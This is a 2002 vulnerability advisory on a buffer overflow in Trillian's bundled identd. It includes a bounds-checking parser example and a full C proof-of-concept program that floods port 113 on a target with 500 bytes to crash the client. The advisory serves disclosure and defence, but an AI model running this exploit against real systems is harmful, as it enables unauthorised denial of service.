Trillian Identd Remote Buffer Overflow Vulnerability
Release date: 2002-09-18
Update date: 2002-09-25
Affected systems:
Cerulean Studios Trillian 0.74
Cerulean Studios Trillian 0.73
Cerulean Studios Trillian 0.725
Cerulean Studios Trillian 0.6351
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
Description:
BUGTRAQ ID: 5733
Cerulean Studios Trillian is a chat program that provides a single interface to several instant messaging networks, including AIM, ICQ, Yahoo! Messenger, MSN Messenger and IRC.
The identd daemon bundled with Trillian does not handle user requests correctly. A remote attacker could exploit this vulnerability to execute arbitrary instructions on the system with the privileges of the Trillian user.
The ident service bundled with Trillian is used to send ident replies when connecting to IRC servers. The ident service does not check the length of requests submitted by users: an attacker can connect to port 113, on which the Trillian identd service listens, and send 418 or more bytes of data, causing the client to crash and corrupting memory. Carefully constructed data could allow arbitrary instructions to be executed on the system with the privileges of the Trillian user.
<* Source: Lance Fitz-Herbert (fitzies@hotmail.com)
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=103236601328359&w=2
*>
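The defect described above is a missing length check on the ident request line. As an added example (not Trillian's code and not from the advisory's author), the parser below shows how an RFC 1413 request handler bounds the request before copying it: the 128-byte limit, the function names and the status codes are assumptions made for this illustration.

```c
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
/* Maximum accepted request length (constructed limit for this example;
 * an RFC 1413 "port , port" request is far shorter). */
#define IDENT_MAX_REQ 128
enum ident_status { IDENT_OK = 0, IDENT_TOO_LONG = 1, IDENT_MALFORMED = 2 };

/* Parse one decimal TCP port (1..65535) with optional surrounding blanks.
 * Advances *p past what was consumed; returns 0 on failure. */
static int parse_port(const char **p, unsigned *port)
{
    char *end;
    unsigned long v;
    while (**p == ' ' || **p == '\t') (*p)++;
    if (!isdigit((unsigned char)**p)) return 0;
    v = strtoul(*p, &end, 10);
    if (v < 1 || v > 65535) return 0;
    *p = end;
    while (**p == ' ' || **p == '\t') (*p)++;
    *port = (unsigned)v;
    return 1;
}

/* Consume one ident request ("<server-port> , <client-port>\r\n") from
 * received bytes. The line is copied into the fixed-size local buffer only
 * after its length has been checked, so an oversized request (such as the
 * 418+ bytes in the advisory) is rejected instead of overrunning memory. */
enum ident_status ident_parse_request(const char *data, size_t len,
                                      unsigned *server_port,
                                      unsigned *client_port)
{
    char line[IDENT_MAX_REQ + 1];
    const char *p;
    size_t n;
    for (n = 0; n < len && n < IDENT_MAX_REQ; n++)
        if (data[n] == '\n') break;
    if (n >= IDENT_MAX_REQ) return IDENT_TOO_LONG;   /* no terminator within limit */
    if (n == len) return IDENT_MALFORMED;            /* buffer ended before newline */
    memcpy(line, data, n);
    line[n] = '\0';
    if (n > 0 && line[n - 1] == '\r') line[n - 1] = '\0';
    p = line;
    if (!parse_port(&p, server_port) || *p != ',') return IDENT_MALFORMED;
    p++;
    if (!parse_port(&p, client_port) || *p != '\0') return IDENT_MALFORMED;
    return IDENT_OK;
}
```

A server built on this reads from the socket into a bounded buffer, calls ident_parse_request on what it has, and closes the connection on IDENT_TOO_LONG rather than continuing to accumulate bytes.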
Test method:
Warning
The following program (method) may be offensive in nature and is provided solely for security research and teaching. Users bear the risk themselves!
/* Trillian-Ident.c
   Author: Lance Fitz-Herbert
   Contact: IRC: Phrizer, DALnet - #KORP
            ICQ: 23549284
   Exploits the Trillian Ident Flaw.
   Tested On Version .74 and .73
   Compiles with Borland 5.5 (link against the Winsock library, e.g. wsock32.lib)
   This Example Will Just DoS The Trillian Client.
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* 500 bytes of 'A': more than the ~418 bytes the advisory says the identd cannot handle */
char payload[500];

int main(int argc, char *argv[]) {
    int iret;
    struct hostent *host;
    SOCKET sockhandle;
    SOCKADDR_IN address;
    WSADATA wsdata;

    if (argc < 2) {
        printf("\nTrillian Ident DoS\n");
        printf("----------------------\n");
        printf("Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\n");
        printf("Tested On Version .74 and .73\n\n");
        printf("Usage: trillian-ident <address>\n");
        return 0;
    }

    WSAStartup(MAKEWORD(1, 1), &wsdata);
    printf("Making Socket Now...\n");
    sockhandle = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    if (sockhandle == INVALID_SOCKET) {   /* socket() signals failure with INVALID_SOCKET */
        printf("Error Creating Socket\n");
        WSACleanup();
        return 1;
    }
    printf("Socket Created\n");

    address.sin_family = AF_INET;
    address.sin_port = htons(113);        /* port the Trillian identd listens on */
    address.sin_addr.s_addr = inet_addr(argv[1]);
    if (address.sin_addr.s_addr == INADDR_NONE) {
        /* not a dotted-quad address: resolve it as a host name */
        printf("Trying To Resolve Host\n");
        host = gethostbyname(argv[1]);
        if (host == NULL) {
            printf("Unknown Host: %s\n", argv[1]);
            closesocket(sockhandle);
            WSACleanup();
            return 1;
        }
        memcpy(&address.sin_addr, host->h_addr_list[0], host->h_length);
    }

    printf("Connecting To Server...\n");
    iret = connect(sockhandle, (struct sockaddr *) &address, sizeof(address));
    if (iret == SOCKET_ERROR) {
        printf("Couldn't Connect\n");
        closesocket(sockhandle);
        WSACleanup();
        return 1;
    }
    printf("Connected to %s!\nSending Payload\n", argv[1]);

    /* The original called strlen() on a buffer with no terminating NUL (undefined
       behaviour); send the whole fixed-size buffer instead. */
    memset(payload, 'A', sizeof(payload));
    send(sockhandle, payload, sizeof(payload), 0);
    Sleep(100);
    closesocket(sockhandle);
    WSACleanup();
    return 0;
}
Recommendations:
Temporary workaround:
If you cannot install a patch or upgrade immediately, NSFOCUS recommends the following measures to reduce the threat:
* Temporarily disable the ident service, or use access control to restrict access to port 113.
Severity: 10 (user vote)